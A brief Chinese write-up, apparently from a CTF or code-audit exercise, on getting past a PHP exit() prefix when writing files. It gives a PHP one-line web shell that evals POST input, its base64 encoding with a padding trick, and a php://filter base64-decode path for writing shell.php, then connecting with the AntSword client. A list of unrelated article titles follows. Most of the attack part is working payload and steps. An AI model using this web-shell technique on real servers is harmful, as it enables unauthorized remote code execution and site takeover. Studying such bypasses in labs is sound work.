代码审计,发现写进去的东西会加上exit,这样的话后面的内容就不能执,那就写个过滤器进行绕过,重点是考虑一下base64的解码位置,构造一句话木马,
使用base64的话
<?php eval($_POST['a']);
Base64 编码后:PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7
需要给前面随便补充一位,过滤器是php://filter/write=convert.base64-decode/resource=shell.php
写入成功后用蚁剑连接
相关推荐
kishu_iOS&AI1 天前
Conda 简要说明与常用指令wal13145201 天前
Dify发布V1.13.1版本,Hologres 向量数据库支持、HITL 邮件 Markdown 渲染及多项安全加固陈天伟教授1 天前
人工智能应用- 预测新冠病毒传染性:04. 中国:强力措施遏制疫情jxkejiiii1 天前
巧用手机原生功能,零成本给重要文档加密防护Dola_Zou1 天前
工业软件安全架构向模块化授权演进的解析互成1 天前
加密系统哪款最好用?2026年五款加密系统深度对比测评CDN3601 天前
游戏服稳定运行:360CDN SDK 游戏盾实测体验纽创信安1 天前
纽创信安与SGS启动网络安全ISO 21434认证项目市象2 天前
小红书盯上“AI版郑州帮”CertiK2 天前
CertiK实测:Skill扫描并非安全边界